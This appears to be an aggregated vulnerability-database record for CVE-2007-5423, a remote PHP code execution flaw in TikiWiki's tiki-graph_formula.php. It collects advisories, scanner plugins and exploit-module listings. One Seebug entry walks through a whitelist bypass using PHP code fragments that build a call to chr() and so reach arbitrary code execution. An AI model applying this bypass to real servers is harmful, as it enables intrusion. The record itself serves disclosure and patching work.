{"result": {"cve": [{"id": "CVE-2007-5423", "type": "cve", "title": "CVE-2007-5423", "description": "tiki-graph_formula.php in TikiWiki 1.9.8 allows remote attackers to execute arbitrary code via PHP sequences in the f array parameter, which are processed by create_function.", "published": "2007-10-12T19:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5423", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-10-19T11:12:58"}], "packetstorm": [{"id": "PACKETSTORM:82370", "type": "packetstorm", "title": "TikiWiki tiki-graph_formula Remote Command Execution", "description": "", "published": "2009-10-30T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://packetstormsecurity.com/files/82370/TikiWiki-tiki-graph_formula-Remote-Command-Execution.html", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-12-05T22:15:01"}], "canvas": [{"id": "TIKIWIKI_EXEC", "type": "canvas", "title": "Immunity Canvas: TIKIWIKI_EXEC", "description": "**Name**| tikiwiki_exec \n---|--- \n**CVE**| CVE-2007-5423 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| TikiWiki function create exploit \n**Notes**| CVSS: 7.5 \nRepeatability: Infinite \nVENDOR: Tikiwiki \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5423 \nCVE Name: CVE-2007-5423 \n\n", "published": "2007-10-12T19:17:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/tikiwiki_exec", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-09-25T14:13:45"}], "nessus": [{"id": "GENTOO_GLSA-200710-21.NASL", "type": "nessus", "title": "GLSA-200710-21 : TikiWiki: Arbitrary command execution", "description": "The remote host is affected by the vulnerability described in 
GLSA-200710-21 (TikiWiki: Arbitrary command execution)\n\n ShAnKaR reported that input passed to the 'f' array parameter in tiki-graph_formula.php is not properly verified before being used to execute PHP functions.\n Impact :\n\n An attacker could execute arbitrary code with the rights of the user running the web server by passing a specially crafted parameter string to the tiki-graph_formula.php file.\n Workaround :\n\n There is no known workaround at this time.", "published": "2007-10-25T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=27553", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-10-29T13:39:18"}, {"id": "TIKIWIKI_F_CMD_EXEC.NASL", "type": "nessus", "title": "TikiWiki tiki-graph_formula.php f Parameter Arbitrary Command Execution", "description": "The remote host is running TikiWiki, an open source wiki application written in PHP.\n\nThe version of TikiWiki on the remote host fails to sanitize input to the 'f[]' parameter of the 'tiki-graph_formula.php' script before using it as a function call. 
Regardless of PHP's 'register_globals' setting, an unauthenticated attacker can leverage this issue to execute arbitrary code on the remote host subject to the privileges of the web server user id.", "published": "2007-10-11T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=26968", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-10-29T13:41:19"}, {"id": "GENTOO_GLSA-200711-19.NASL", "type": "nessus", "title": "GLSA-200711-19 : TikiWiki: Multiple vulnerabilities", "description": "The remote host is affected by the vulnerability described in GLSA-200711-19 (TikiWiki: Multiple vulnerabilities)\n\n Stefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion.\n Impact :\n\n A remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application.\n Workaround :\n\n There is no known workaround at this time.", "published": "2007-11-15T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=28219", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2018-01-13T01:02:29"}], "gentoo": [{"id": "GLSA-200710-21", "type": "gentoo", "title": "TikiWiki: Arbitrary command execution", "description": "### Background\n\nTikiWiki is an open source content management system written in PHP. \n\n### Description\n\nShAnKaR reported that input passed to the \"f\" array parameter in tiki-graph_formula.php is not properly verified before being used to execute PHP functions. 
\n\n### Impact\n\nAn attacker could execute arbitrary code with the rights of the user running the web server by passing a specially crafted parameter string to the tiki-graph_formula.php file. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll TikiWiki users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/tikiwiki-1.9.8.1\"", "published": "2007-10-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200710-21", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-09-06T19:46:09"}, {"id": "GLSA-200711-19", "type": "gentoo", "title": "TikiWiki: Multiple vulnerabilities", "description": "### Background\n\nTikiWiki is an open source content management system written in PHP. \n\n### Description\n\nStefan Esser reported that a previous vulnerability (CVE-2007-5423, GLSA 200710-21) was not properly fixed in TikiWiki 1.9.8.1 (CVE-2007-5682). The TikiWiki development team also added several checks to avoid file inclusion. \n\n### Impact\n\nA remote attacker could exploit these vulnerabilities to inject arbitrary code with the privileges of the user running the application. \n\n### Workaround\n\nThere is no known workaround at this time. 
\n\n### Resolution\n\nAll TikiWiki users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=www-apps/tikiwiki-1.9.8.3\"", "published": "2007-11-14T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://security.gentoo.org/glsa/200711-19", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2016-09-06T19:46:04"}], "seebug": [{"id": "SSV:2363", "type": "seebug", "title": "TikiWiki Tiki-Graph_Formula.PHP Whitelist Check Code Injection Vulnerability", "description": "TikiWiki is a content management system/portal system/groupware system built on PHP, ADOdb and Smarty.\r\nThe tiki-graph_formula.php script included in TikiWiki does not properly filter user-supplied parameters; a remote attacker can exploit this vulnerability to inject malicious PHP code and execute it with the privileges of the web server.\r\nTikiWiki's tiki-graph_formula.php script uses PHP's create_function() to create an anonymous function that dynamically evaluates the mathematical function supplied by the user through the 'f' URL parameter.\r\nTo protect against the execution of arbitrary PHP code, the TikiWiki developers combined a blacklist with a whitelist. On the one hand they blacklist three characters; on the other hand only certain alphanumeric strings are allowed in the user-supplied input.\r\nThe three blacklisted characters are:\r\n` - Allows execution of shell commands\r\n' - String delimiter\r\n\" - String delimiter\r\nThe whitelist of allowed alphanumeric strings only permits certain mathematical function names, such as: sin, cos, tan, pow, ...\r\nWhen ShAnKaR audited TikiWiki, the whitelist check turned out to be implemented incorrectly, which allowed PHP functions to be executed. This vulnerability was published as CVE-2007-5423 and fixed in the TikiWiki 1.9.8.1 update.\r\nHowever, because PHP supports variable functions and variable variables, the patched whitelist does not protect against arbitrary PHP code execution:\r\n$varname = 'othervar';\r\n$$varname = 4; // set $othervar to 4\r\n$funcname = 'chr';\r\n$funcname(95); // call chr(95)\r\nBecause TikiWiki's blacklist does not cover the '$' character, injected PHP expressions can use temporary variables such as $sin, $cos, $tan, ...\r\nIt is therefore clear that the protection can be bypassed by filling temporary variables with strings that name other functions.\r\nAlthough it appears difficult to get strings into the temporary variables, since all allowed functions return only numbers, two PHP features help solve this problem: array-to-string conversion and the handling of unknown constants:\r\n$sin=cosh; // cosh is an unknown constant. \r\n// PHP assumes the string 'cosh' as value\r\n$sin[]=pi(); // Creates an array\r\n$sin=$sin.$sin; // Stringconcats of arrays. Array to string \r\n// conversion. Becomes 'ArrayArray'\r\nCombining these methods with the ++ operator, which can also increment alphanumeric strings, makes it possible to call the chr() function as follows:\r\n$tan=pi()-pi(); // Get 0 into $tan\r\n$sin=cosh; // Get the string 'cosh' into $sin\r\n$min=$sin[$tan]; // Get 'c' into $min\r\n$tan++; // Get 1 into $tan\r\n$min.=$sin[$tan+$tan+$tan] // Append 'h' to 'c'\r\n$min.=$sin[$tan]; // Append 'o' to 'ch'\r\n$min++; // Increment 'cho' to 'chp'\r\n$min++; // Increment 'chp' to 'chq'\r\n$min++; // Increment 'chq' to 'chr'\r\n$min($tan) // Call chr(1)\r\nWith access to the chr() function it is possible to build arbitrary strings and call any other function, resulting in arbitrary PHP code execution.\r\n\n\nTikiWiki Project TikiWiki 1.9.8 1\r\nTikiWiki Project TikiWiki 1.9.8 \r\nTikiWiki Project TikiWiki 1.9.7 \r\nTikiWiki Project TikiWiki 1.9.6 \r\nTikiWiki Project TikiWiki 1.9.5 \r\nTikiWiki Project TikiWiki 1.9.4 \r\nTikiWiki Project TikiWiki 1.9.3 2\r\nTikiWiki Project TikiWiki 1.9.3 1\r\nTikiWiki Project TikiWiki 1.9.2 \r\nTikiWiki Project TikiWiki 1.9.1 .1\r\nTikiWiki Project TikiWiki 1.9.1 \r\nTikiWiki Project TikiWiki 1.9 -rc3.1\r\nTikiWiki Project TikiWiki 1.9 -rc3\r\nTikiWiki Project TikiWiki 1.9 -rc2\r\nTikiWiki Project TikiWiki 1.9 -rc1\r\n\n Upgrade:\r\nTikiWiki Project tikiwiki-1.9.8.2.tar.gz\r\nhttp://downloads.sourceforge.net/tikiwiki/tikiwiki-1.9.8.2.tar.gz?modtime=1193347915&big_mirror=1", "published": "2007-10-31T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": 
"https://www.seebug.org/vuldb/ssvid-2363", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-11-19T21:55:54"}], "exploitdb": [{"id": "EDB-ID:16911", "type": "exploitdb", "title": "TikiWiki tiki-graph_formula Remote PHP Code Execution", "description": "TikiWiki tiki-graph_formula Remote PHP Code Execution. CVE-2007-5423. Webapps exploit for php platform", "published": "2010-09-20T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/16911/", "cvelist": ["CVE-2007-5423"], "lastseen": "2016-02-02T06:48:07"}], "openvas": [{"id": "OPENVAS:58700", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200710-21 (tikiwiki)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200710-21.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=58700", "cvelist": ["CVE-2007-5423"], "lastseen": "2017-07-24T12:49:56"}, {"id": "OPENVAS:59239", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200711-19 (tikiwiki)", "description": "The remote host is missing updates announced in\nadvisory GLSA 200711-19.", "published": "2008-09-24T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "http://plugins.openvas.org/nasl.php?oid=59239", "cvelist": ["CVE-2007-5682", "CVE-2007-5423"], "lastseen": "2017-07-24T12:50:02"}], "metasploit": [{"id": "MSF:EXPLOIT/UNIX/WEBAPP/TIKIWIKI_GRAPH_FORMULA_EXEC", "type": "metasploit", "title": "TikiWiki tiki-graph_formula Remote PHP Code Execution", "description": "TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker to execute arbitrary PHP code. 
The issue is due to 'tiki-graph_formula.php' script not properly sanitizing user input supplied to create_function(), which may allow a remote attacker to execute arbitrary PHP code resulting in a loss of integrity.", "published": "2009-07-21T15:20:35", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "cvelist": ["CVE-2007-5423"], "lastseen": "2018-03-21T10:03:21"}]}}